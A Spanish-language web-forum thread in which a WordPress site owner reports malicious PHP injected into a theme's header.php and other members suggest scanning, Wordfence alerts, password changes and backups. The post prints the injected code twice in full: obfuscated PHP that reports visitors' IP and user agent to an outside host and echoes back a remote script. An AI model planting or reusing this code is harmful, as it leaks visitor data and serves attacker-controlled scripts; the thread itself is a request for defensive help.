Problema de código malicioso en Wordpress

oscarva

oscarva Seguir

Lambda
Desde
4 Jun 2009
Mensajes
2.893
Hola compañeros buenas noches.

Desde hace un tiempo vengo notando que están insertando código seguramente malicioso en mi wordpress, hace unos 20 días borre dicho código, actualice todos los plugins, elimine todo lo innecesario incluyendo themes que no uso y demás. Pero hoy nuevamente me apareció en código.

El código lo insertan en el header.php del tema, justo después del <body> y el código inyectado es el siguiente:

Insertar CODE, HTML o PHP: 
<?php
#8d54b6#
error_reporting(0); ini_set('display_errors',0); $wp_ko2 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_ko2) && !preg_match ('/bot/i', $wp_ko2))){
$wp_ko092="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ko2);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_ko092);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_2ko = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_2ko,1,3) === 'scr' ){ echo $wp_2ko; }
echo $wp_2ko;
#/8d54b6#
?>

Por más que busque por todo lado, no encontré ayuda ni nada parecido en google, una pista es que en otro sitio donde uso el mismo theme también estaba el mismo código insertado, así que esto me puede indicar que se trata de un problema con el theme.

a alguien le ha pasado? alguna ayuda?

Un saludo.
 
Cicklow

Cicklow

Admin
Dseda
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
¡Usuario popular!
Suscripción a IA
Desde
30 May 2011
Mensajes
1.101
oscarva dijo:
Hola compañeros buenas noches.

Desde hace un tiempo vengo notando que están insertando código seguramente malicioso en mi wordpress, hace unos 20 días borre dicho código, actualice todos los plugins, elimine todo lo innecesario incluyendo themes que no uso y demás. Pero hoy nuevamente me apareció en código.

El código lo insertan en el header.php del tema, justo después del <body> y el código inyectado es el siguiente:

Insertar CODE, HTML o PHP: 
<?php
#8d54b6#
error_reporting(0); ini_set('display_errors',0); $wp_ko2 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_ko2) && !preg_match ('/bot/i', $wp_ko2))){
$wp_ko092="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ko2);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_ko092);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_2ko = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_2ko,1,3) === 'scr' ){ echo $wp_2ko; }
echo $wp_2ko;
#/8d54b6#
?>

Por más que busque por todo lado, no encontré ayuda ni nada parecido en google, una pista es que en otro sitio donde uso el mismo theme también estaba el mismo código insertado, así que esto me puede indicar que se trata de un problema con el theme.

a alguien le ha pasado? alguna ayuda?

Un saludo.
Hacer clic para expandir...

Una ves con acceso a tu server, peuden acceder a todos tus sitios... si vas al editor de themes de WP y editas el header.php ves ese code? sino lo ves es porque se metio en functions.php o en algun otro file para hacer la inyección... podrias colocar wordfence y que te avise si tus archivos son modificados.
 
oscarva

oscarva

Lambda
Desde
4 Jun 2009
Mensajes
2.893
cicklow dijo:
Una ves con acceso a tu server, peuden acceder a todos tus sitios... si vas al editor de themes de WP y editas el header.php ves ese code? sino lo ves es porque se metio en functions.php o en algun otro file para hacer la inyección... podrias colocar wordfence y que te avise si tus archivos son modificados.
Hacer clic para expandir...


Gracias compañero, justamente el que me aviso fue el wordfence... el codigo si esta insertado directamente en el header.php
 
Cicklow

Cicklow

Admin
Dseda
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
¡Usuario popular!
Suscripción a IA
Desde
30 May 2011
Mensajes
1.101
oscarva dijo:
Gracias compañero, justamente el que me aviso fue el wordfence... el codigo si esta insertado directamente en el header.php
Hacer clic para expandir...

Entonces tendras que escanear tu server...contacta con soporte para que hagan un scan (o si tienes un VPS o Dedicado puedes hacerlo tu desde cpanel).
 
E

emski

Pi
Verificación en dos pasos activada
Desde
27 Jul 2012
Mensajes
5.187
Eso pasa la mayoría de veces por themes nulled, pero creo que no es tu caso.

Da miedo con estos hackers :$

No se hasta dónde puede llegar a perjudicar un hacker, pero te recomendaría tener backups de las bases de datos por si las llegaras a necesitar.
 
Q

qcdar

Gamma
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
26 Jun 2012
Mensajes
362
No lo mencionas pero debes cambiar la contraseña del panel de control y del ftp o seguiran entrando.

En mi caso bajo los archivos luego con dreamweaver o herramienta similar abro todos y le doy buscar en documentos abiertos y pongo fragmentos del spam o virus con eso ya ves bien que no tenga ningun archivo
 
Hay que estar conectado o registrado para responder aquí.
Arriba